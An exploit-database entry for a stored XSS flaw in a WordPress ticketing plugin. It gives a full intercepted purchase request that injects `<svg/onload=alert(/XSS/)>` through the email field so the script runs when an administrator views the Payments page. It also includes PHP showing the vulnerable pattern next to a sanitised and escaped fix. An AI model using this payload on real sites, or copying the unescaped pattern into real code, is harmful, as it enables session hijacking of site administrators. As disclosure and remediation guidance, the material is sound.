## https://sploitus.com/exploit?id=WPEX-ID:D973DC0F-3CB4-408D-A8B0-01ABEB9EF951
As an unauthenticated user, book a ticket, fill in the purchase form with dummy data and intercept the request to change the email address (which is validated client side but not server side) to something like `<svg/onload=alert(/XSS/)>`:

```http
POST /purchase/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 413
Origin: http://wp.lab
Connection: close
Cookie: mt_unique_id=-KFPBzwr-0Y2BZ1a
Upgrade-Insecure-Requests: 1

_wpnonce=97e4184df7&mt_gateway=offline&mt_cart_order%5B1950%5D%5Badult%5D%5Bcount%5D=1&mt_cart_order%5B1950%5D%5Badult%5D%5Bprice%5D=1.00&mt_cart_order%5B1950%5D%5Badult%5D%5Borig_price%5D=1&mt_fname=XSS&mt_lname=swd&mt_email=<svg/onload=alert(/XSS/)>&mt_email2=<svg/onload=alert(/XSS/)>&ticketing_method=printable&mt_submit=Review+cart+and+make+payment&my-tickets=true
```

Then confirm the reservation. The XSS is triggered when an administrator views the Payments page in the admin dashboard (/wp-admin/edit.php?post_type=mt-payments), because the stored email value is rendered there without escaping.
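The root cause is a server side trust in the client side email check, combined with unescaped output in the admin list. The following is an added illustration, not the plugin's own code: the `mt_email` / `mt_email2` field names come from the request above, while the `mt_example_*` function names and the data flow around them are assumptions, showing the vulnerable pattern beside the hardened one using WordPress core helpers.

```php
<?php
// Added example, not the plugin's code. Field names mt_email and mt_email2
// are from the intercepted request; the mt_example_* functions are assumed.

// Vulnerable pattern: the only email check happens in the browser, so the
// handler stores whatever arrives and the admin screen echoes it raw.
function mt_example_save_vulnerable( array $post ) {
    return array( 'email' => $post['mt_email'] ); // may be <svg/onload=...>
}

function mt_example_render_vulnerable( array $payment ) {
    // Output in wp-admin without escaping: the stored markup executes.
    echo '<td>' . $payment['email'] . '</td>';
}

// Hardened pattern: validate and sanitize on input, escape on output.
function mt_example_save_hardened( array $post ) {
    $email  = sanitize_email( wp_unslash( $post['mt_email'] ?? '' ) );
    $email2 = sanitize_email( wp_unslash( $post['mt_email2'] ?? '' ) );

    // is_email() enforces the format server side regardless of the client.
    if ( ! is_email( $email ) ) {
        return new WP_Error( 'mt_bad_email', 'Please enter a valid email address.' );
    }
    // The form carries a confirmation field; compare it server side too.
    if ( $email !== $email2 ) {
        return new WP_Error( 'mt_email_mismatch', 'Email addresses do not match.' );
    }
    return array( 'email' => $email );
}

function mt_example_render_hardened( array $payment ) {
    // Escape at the point of output even though the value was validated,
    // so a record written by any other path cannot inject markup either.
    echo '<td>' . esc_html( $payment['email'] ) . '</td>';
}
```

Both sanitizing the value and escaping it on output are needed: sanitizing alone leaves older stored records exploitable, and escaping alone still lets junk into the database.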